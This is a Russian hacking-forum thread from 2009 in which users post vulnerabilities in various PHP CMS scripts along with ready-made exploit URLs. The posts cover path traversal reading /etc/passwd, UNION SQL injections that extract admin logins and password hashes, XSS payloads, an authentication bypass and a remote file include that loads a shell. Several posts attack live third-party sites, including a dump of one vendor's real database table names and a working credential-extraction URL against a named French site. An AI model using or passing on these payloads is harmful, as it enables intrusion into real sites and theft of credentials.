ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #121  
Старый 29.04.2009, 21:10
Аватар для [underwater]
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

lcxBBportal

Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz

Vuln File: portal/includes/portal_block.php

Viln Code:
Код:
include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
includes/acp/acp_lcxbbportal.php
$phpbb_portal_path = $phpbb_root_path . 'portal/';
require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx);
require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx);
include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
Exploit:

Код:
http://site.com/portal/includes/portal_block.php?phpbb_root_path=../../../../../../../etc/passwd
http://site.com/includes/acp/acp_lcxbbportal.php?phpbb_root_path=../../../../../../../etc/passwd

photoDiary 1.2


Download:
http://code.google.com/p/photodiary/downloads/list

Vuln File: admin/index.php


Vuln Code:
Код:
$act = $_GET['act'];
.....
if($act=="edit" || $act=="new"){
$id = $_GET['id'];
Exploit:
Код:
http://site.com/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--
Например на оффе:
http://photodiary.webgriffe.com/demo/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--

Последний раз редактировалось [underwater]; 29.04.2009 в 21:24..
 
Ответить с цитированием

  #122  
Старый 30.04.2009, 04:51
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Уязвимости RevolutionBB 1.6(возможно и более ранние версии)
download: http://www.revbb.net/releases/revbbv1-6.zip
dork: "RevolutionBB 2008-2009"

SQL-injection(требования: magic_quotes=off)

Инъекции есть буквально в каждом скрипте, приведу всего лишь 1 пример:

уязвимый код:

composemsg.php
PHP код:
$id $_GET['id'];
$privatem mysql_query(
                
"SELECT *
                FROM
                "
.PREFIX."pms
                WHERE id='
$id'"
);
$private mysql_fetch_array($privatem); 
эксплуатирование:
Код:
composemsg.php?id=1'+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10+from+<prefix>_members--+

(с) Iceangel_
 
Ответить с цитированием

BLOX CMS
  #123  
Старый 13.05.2009, 00:48
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию BLOX CMS

BLOX CMS
Сайт: http://blox.ru/


SQL-injection

Уязвимый код:
editPageParams.php
PHP код:
. . .
 if (empty(
$_SESSION['page']))
     
$aa $_GET['page'];
 else 
$aa $_SESSION['page'];

 
$U LD($aa);
. . . 
getPageParams.php
PHP код:
 function LD($NA)
 {
 . . .
    if (!empty(
$NA))
    {
       
$result mysql_query"SELECT * FROM ".C."pages WHERE id=$NA LIMIT 1");
 . . .
 } 
Эксплуатация:
Цитата:
site.com/?page=-1+union+select+1,2,3,4,5,concat_ws(0x2F,login,pass wrd)+from+[префикс]_users--+
 
Ответить с цитированием

  #124  
Старый 13.05.2009, 17:26
Аватар для bug1z
bug1z
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218

Репутация: 59
По умолчанию

Так же у вышеуказанного скрипта есть уязвимость позволяющая попасть в админку без авторизации!
В скрипте authenticate.php
PHP код:
<?php
 
include BLOXDIR."/inc/redirect.php"RO(); function RO() { $O $_POST['login']; $BM $_POST['passwrd']; $TJ false; if (!empty($O) && !empty($BM)) { $A "SELECT permit FROM ".C."users WHERE login = '$O' AND passwrd = '$BM'"; if ($result mysql_query($A)) { if ($row mysql_fetch_assoc($result)) { if ('admin' == $O$TJ true; elseif (!empty($row['permit'])) $TJ true; } } } if (!empty($TJ)) { $_SESSION['login'] = $O; if (isset($_POST['savePasswrd'])) { if (!empty($_POST['savePasswrd'])) { $V = array ($_POST['login'], $_POST['passwrd']); $NP base64_encode(serialize($V)); if (setcookie('blox'"$NP"time() + 432000)); } else if (setcookie('blox'""time() + 10)); } } } ?>
В самом начале скпипта мы видим инклуд некого редерикт.пхп:
Код:
include BLOXDIR."/inc/redirect.php
Смотрим его код:
PHP код:
<?php
 KQ
(); function KQ() { $BG "?"; if (SID$BG .= SIDheader("Location: $BG"); } ?>
Вроде ничего особенного, обычный редерикт, но после header("Location: $BG"); не указан die() or exit() , таким образом нас хоть и пересылает по адресу редерикта, но скрипт всё равно выполняется!
Скачав прогу инеткряк или её аналог мы можем послать http запрос и попасть в админку!
 
Ответить с цитированием

  #125  
Старый 14.05.2009, 21:13
Аватар для [underwater]
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

BIGACE
Download:http://downloads.sourceforge.net/bigace/bigace_2.5_RC2.zip

POST:
Код:
<script type="text/javascript">
function changeURL(){ var URL = document.getElementById("site"); document.forms[0].action= URL.value; }
</script>
<form method="POST" id="target" action="">
Test site:<br>
<input type="text" size="80" id="site" value="http://site.com/public/index.php?cmd=application&id=-1_tsearch_len">
<br><br>JavaScript to execute:<br>
<textarea name="language" id="JScode"  rows="5" cols="60">>"><script>alert(0);</script></textarea>
<input type="submit" OnClick="changeURL()">
</form>
 
Ответить с цитированием

  #126  
Старый 14.05.2009, 21:45
Аватар для bug1z
bug1z
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218

Репутация: 59
По умолчанию

GENERAL-CMS

Как они заявляют:
Код:
General-CMS - одна из ведущих систем управления сайтом в своей отрасли!
Увы уязвимый код показать не смогу, так как двиг платный, а платить не хочется

Возьмём офф сайт:

http://www.cms-soft.ru/

И офигеем, за что они хотят от 800р до 3000р =//

SQL INJECTION:
1)
Код:
http://www.cms-soft.ru/index.php?level1&levelid=18'+union+select+1,2,version()--+/index.php
2)
Код:
http://cms-soft.ru/cms/7'+union+select+1,2,version()--+/index.php
Итак, что я вытянул:

на сайте крутится 4 БД:

Код:
information_schema
shop-imperial
shop-imperial_affiliate	
shop-imperial_post
из information_schema я вытащил названия таблиц, их там предостаточно:

Код:
cmssystemaddress
cmssystemadmin	
cmssystemadrscom	
cmssystemcategories
cmssystemcategoriesdop	
cmssystemcatshops
cmssystemmetashops
cmssystemonline
cmssystemorder
cmssystemordergoods
cmssystempages	
cmssystempagesdop	
cmssystempassport	
cmssystemshops	
cmssystemusers	
demoadmin	
democategories
democategoriesdop
demometa	
demometadop	
demopages	
demopagesdop	
flashcat_backlinks
flashcat_categories
flashcat_conf
flashcat_sites
generalavtoaddress
generalavtoadmin
generalavtoadrscom
generalavtocategories
generalavtocategoriesdop
generalavtocatshops	
generalavtometashops	
generalavtoonline	
generalavtoorder	
generalavtoordergoods
generalavtopages
generalavtopagesdop
generalavtopassport
generalavtoshops	
generalavtousers	
generalboardruaddress	
generalboardruadmin	
generalboardruadrscom	
generalboardruannouncements
generalboardrucatboard
generalboardrucategories
generalboardrucategoriesdop
generalboardrucatshops	
generalboardrumetaboard	
generalboardrumetashops
generalboardruonline
generalboardruorder	
generalboardruordergoods	
generalboardrupages	
generalboardrupagesdop	
generalboardrupassport	
generalboardrushops	
generalboardruusers	
generalcultureruaddress	
generalcultureruadmin	
generalcultureruadrscom
generalcultureruannouncements
generalculturerucatboard	
generalculturerucategories	
generalculturerucategoriesdop
generalculturerucatshops
generalculturerumetaboard
generalculturerumetashops
generalcultureruonline
generalcultureruorder
generalcultureruordergoods
generalculturerupages	
generalculturerupagesdop	
generalculturerupassport	
generalculturerushops	
generalcultureruusers	
generalestatesruaddress
generalestatesruadmin
generalestatesruadrscom
generalestatesruannouncements
generalestatesrucatboard	
generalestatesrucategories	
generalestatesrucategoriesdop
generalestatesrucatshops
generalestatesrumetaboard
generalestatesrumetashops
generalestatesruonline	
generalestatesruorder	
generalestatesruordergoods
generalestatesrupages
generalestatesrupagesdop
generalestatesrupassport
generalestatesrushops	
generalestatesruusers	
generalhouseaddress	
generalhouseadmin	
generalhouseadrscom	
generalhouseannouncements
generalhousecatboard	
generalhousecategories	
generalhousecategoriesdop
generalhousecatshops
generalhousemetaboard	
generalhousemetashops	
generalhouseonline	
generalhouseorder	
generalhouseordergoods	
generalhousepages	
generalhousepagesdop	
generalhousepassport	
generalhouseshops	
generalhouseusers	
generalpropertyruaddress
generalpropertyruadmin	
generalpropertyruadrscom	
generalpropertyruannouncements	
generalpropertyrucatboard	
generalpropertyrucategories	
generalpropertyrucategoriesdop	
generalpropertyrucatshops	
generalpropertyrumetaboard	
generalpropertyrumetashops	
generalpropertyruonline
generalpropertyruorder
generalpropertyruordergoods	
generalpropertyrupages	
generalpropertyrupagesdop
generalpropertyrupassport
generalpropertyrushops	
generalpropertyruusers
generalrealruaddress
generalrealruadmin
generalrealruadrscom	
generalrealruannouncements	
generalrealrucatboard	
generalrealrucategories	
generalrealrucategoriesdop
generalrealrucatshops
generalrealrumetaboard
generalrealrumetashops	
generalrealruonline	
generalrealruorder	
generalrealruordergoods	
generalrealrupages	
generalrealrupagesdop	
generalrealrupassport	
generalrealrushops
generalrealruusers
generalscienceaddress
generalscienceadmin	
generalscienceadrscom	
generalscienceannouncements
generalsciencecatboard
generalsciencecategories
generalsciencecategoriesdop
generalsciencecatshops
generalsciencemetaboard	
generalsciencemetashops	
generalscienceonline	
generalscienceorder	
generalscienceordergoods
generalsciencepages
generalsciencepagesdop
generalsciencepassport
generalscienceshops	
generalscienceusers	
generaltourismaddress
generaltourismadmin
generaltourismadrscom
generaltourismannouncements
generaltourismcatboard	
generaltourismcategories
generaltourismcategoriesdop
generaltourismcatshops
generaltourismmetaboard
generaltourismmetashops
generaltourismonline	
generaltourismorder	
generaltourismordergoods
generaltourismpages
generaltourismpagesdop
generaltourismpassport
generaltourismshops	
generaltourismusers	
importaddress	
importadmin	
importadrscom	
importcategories
importcategoriesdop
importcatshops
importmetashops
importonline
importorder
importordergoods
importpages
importpagesdop
importpassport
importshops	
importusers
kirilladdress
kirilladmin
kirilladrscom
kirillannouncements
kirillcatboard
kirillcategories
kirillcategoriesdop
kirillcatshops
kirillmetaboard
kirillmetashops	
kirillonline	
kirillorder	
kirillordergoods
kirillpages
kirillpagesdop	
kirillpassport
kirillshops
kirillusers	
pinaevaddress	
pinaevadmin	
pinaevadrscom	
pinaevannouncements
pinaevcatboard
pinaevcategories
pinaevcategoriesdop
pinaevcatshops
pinaevmetaboard	
pinaevmetashops	
pinaevonline	
pinaevorder	
pinaevordergoods
pinaevpages
pinaevpagesdop
pinaevpassport
pinaevshops	
pinaevusers	
shopimperial2address
shopimperial2admin
shopimperial2adrscom
shopimperial2categories
shopimperial2categoriesdop
shopimperial2catshops	
shopimperial2metashops	
shopimperial2online	
shopimperial2order	
shopimperial2ordergoods	
shopimperial2pages	
shopimperial2pagesdop	
shopimperial2passport	
shopimperial2shops	
shopimperial2users	
shopimperialadmin	
shopimperialcategories
shopimperialcategoriesdop
shopimperialmeta	
shopimperialmetadop	
shopimperialpages	
shopimperialpagesdop	
trastsoftaddress	
trastsoftadmin	
trastsoftadrscom
trastsoftcategories	
trastsoftcategoriesdop	
trastsoftcatshops	
trastsoftmetashops	
trastsoftonline
shopimperialmetadop
shopimperialpages
shopimperialpagesdop
trastsoftaddress
trastsoftadmin
trastsoftadrscom
trastsoftcategories
trastsoftcategoriesdop
trastsoftcatshops
trastsoftmetashops
trastsoftonline
trastsoftorder
trastsoftordergoods
trastsoftpages
trastsoftpagesdop
trastsoftpassport
trastsoftshops
trastsoftusers
traststroyaddress
traststroyadmin
traststroyadrscom
traststroycategories
traststroycategoriesdop
traststroycatshops
traststroymetashops
traststroyonline
traststroyorder
traststroyordergoods
traststroypages
traststroypagesdop
traststroypassport
traststroyshops
traststroyusers
vall1address
vall1admin
vall1adrscom
vall1categories
vall1categoriesdop
vall1catshops
vall1metashops
vall1online
vall1order
vall1ordergoods
vall1pages
vall1pagesdop
vall1passport
vall1shops
vall1users
vall3address
vall3admin
vall3adrscom
vall3categories
vall3categoriesdop
vall3catshops
vall3metashops
vall3online
vall3order
vall3ordergoods
vall3pages
vall3pagesdop
vall3passport
vall3shops
vall3users
vogeanorgruaddress
vogeanorgruadmin
vogeanorgruadrscom
vogeanorgruannouncements
vogeanorgrucatboard
vogeanorgrucatcompany
vogeanorgrucategories
vogeanorgrucategoriesdop
vogeanorgrucatshops
vogeanorgrufirms
vogeanorgrumetaboard
vogeanorgrumetacompany
vogeanorgrumetashops
vogeanorgruonline
vogeanorgrupages
vogeanorgrupagesdop
vogeanorgrupassport
vogeanorgrushops
vogeanorgruusers
vogeanruaddress
vogeanruadmin
vogeanruadrscom
vogeanrucategories
vogeanrucategoriesdop
vogeanrucatshops
vogeanrumeta
vogeanrumetadop
vogeanrumetashops
vogeanruonline
vogeanruorder
vogeanruordergoods
vogeanrupages
vogeanrupagesdop
vogeanrupassport
vogeanrushops
vogeanruusers
generaladdress
generaladmin
generaladrscom
generalannouncements
generalcatboard
generalcategories
generalcategoriesdop
generalcatshops
generalmetaboard
generalmetashops
generalonline
generalorder
generalordergoods
generalpages
generalpagesdop
generalpassport
generalshops
generalusers
vogeanorgadmin
vogeanorgcategories
vogeanorgcategoriesdop
vogeanorgmeta
vogeanorgmetadop
vogeanorgpages
vogeanorgpagesdop
antipolitikaaddress
antipolitikaadmin
antipolitikaadrscom
antipolitikaannouncements
antipolitikacatboard
antipolitikacategories
antipolitikacategoriesdop
antipolitikacatshops
antipolitikametaboard
antipolitikametashops
antipolitikaonline
antipolitikaorder
antipolitikaordergoods
antipolitikapages
antipolitikapagesdop
antipolitikapassport
antipolitikashops
antipolitikausers
articlesnetaddress
articlesnetadmin
articlesnetadrscom
articlesnetannouncements
articlesnetcatboard
articlesnetcategories
articlesnetcategoriesdop
articlesnetcatshops
articlesnetmetaboard
articlesnetmetashops
articlesnetonline
articlesnetorder
articlesnetordergoods
articlesnetpages
articlesnetpagesdop
articlesnetpassport
articlesnetshops
articlesnetusers
catalogmusicaddress
catalogmusicadmin
catalogmusicadrscom
catalogmusicannouncements
catalogmusiccatboard	
catalogmusiccategories	
catalogmusiccategoriesdop
catalogmusiccatshops
catalogmusicmetaboard
catalogmusicmetashops
catalogmusiconline	
catalogmusicorder	
catalogmusicordergoods
catalogmusicpages
catalogmusicpagesdop
catalogmusicpassport
catalogmusicshops	
catalogmusicusers	
demosaddress	
demosadmin	
demosadrscom	
demosannouncements
demoscatboard
demoscategories	
demoscategoriesdop	
demoscatshops	
demosmetaboard	
demosmetashops	
demosonline	
demosorder	
demosordergoods	
demospages	
demospagesdop	
demospassport	
demosshops	
de
аки хранятся в таблице cmssystemadmin.
Колонки:
Код:
id,login,password,name
Удачи!
 
Ответить с цитированием

  #127  
Старый 15.05.2009, 17:17
Аватар для bug1z
bug1z
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218

Репутация: 59
По умолчанию

MagicSite CMS XSS

В строке поиска <script>alert('Antichat')</script>
Код:
http://www.magicsite.ru/search.php?sword=%3Cscript%3Ealert%28%27Antichat%27%29%3C%2Fscript%3E&x=0&y=0
Одним запросом и XSS и раскрытие путей и скуль инжект не далеке
На сервере у них magic_quotes=ON, так как даные слешируются!
Код:
http://www.magicsite.ru/search.php?sword=1'
Вы искали: "1\'"
Не далеко и скуль инжект!
Админка: http://www.magicsite.ru/admin/

Но вход разршон с браузера Microsoft Internet Explorer версии 5.5 и выше!

P.S.: Её продают за 24 505,00 р. =//

Последний раз редактировалось bug1z; 15.05.2009 в 17:22..
 
Ответить с цитированием

  #128  
Старый 15.05.2009, 17:54
Аватар для bug1z
bug1z
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218

Репутация: 59
По умолчанию

skillz CMS XSS
В поле Поиск по сайту:
"><script>alert(111)</script>
Код:
http://www.skillz.ru/index.php?search=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&m=search
 
Ответить с цитированием

SOS Webpages
  #129  
Старый 16.05.2009, 15:44
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию SOS Webpages

SOS Webpages
Сайт: http://www.soswebpages.com/
Табличка с логинами\хешами админов: hw_admin
Дефолтовый префикс: sos_


SQL-injection

Уязвимый код:
photo.php
PHP код:
 . . .
 if (isset(
$_GET['photo_id'])) {
    
  
$photo_id mysql_real_escape_string($_GET['photo_id']);
  
$sql "SELECT * FROM " $dbprefix "photos WHERE photo_id=$photo_id";
  
$result=mysql_query($sql);  
 . . . 
Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе
Аналогично с переменной event_id в этом же скрипте

PHP код:
 . . .
elseif (isset(
$_GET['event_id'])) {
  
  
$event_id mysql_real_escape_string($_GET['event_id']); 
    . . .
    
$sql "SELECT * FROM " $dbprefix "events WHERE event_id=$event_id";
  
$result=mysql_query($sql);
 . . . 
Эксплуатация:
Цитата:
site.com/index.php?pages_id=1&photo_id=-1+union+select+1,2,3,concat_ws(0x2F,admin_user,adm in_password),5,6+from+sos_hw_admin
Пример:
Цитата:
http://www.temoinsdelamisericorde.fr/index.php?pages_id=38&photo_id=-1+union+select+1,2,3,concat_ws(0x2F,admin_user,adm in_password),5,6+from+sos_hw_admin&p=0
 
Ответить с цитированием

Уязвимости Pinpin Content 0.1 Beta
  #130  
Старый 19.05.2009, 18:25
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию Уязвимости Pinpin Content 0.1 Beta

Уязвимости Pinpin Content 0.1 Beta
download: http://garbure.org/garbure/pinpin_content/pinpin-0.1-beta.tar.gz

RFI(требования: register_globals=on)
/pinpin/pinpin.php
Уязвимость существует из-за отсутствия предварительного определения переменной $level_path, при непосредственном обращении к скрипту.
уязвимый код:
PHP код:
include "$level_path/pinpin/pinpin.conf.php"
эксплуатирование:
Код:
/pinpin/pinpin.php?level_path=http://site.com/shell.txt?

(с) Iceangel_
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ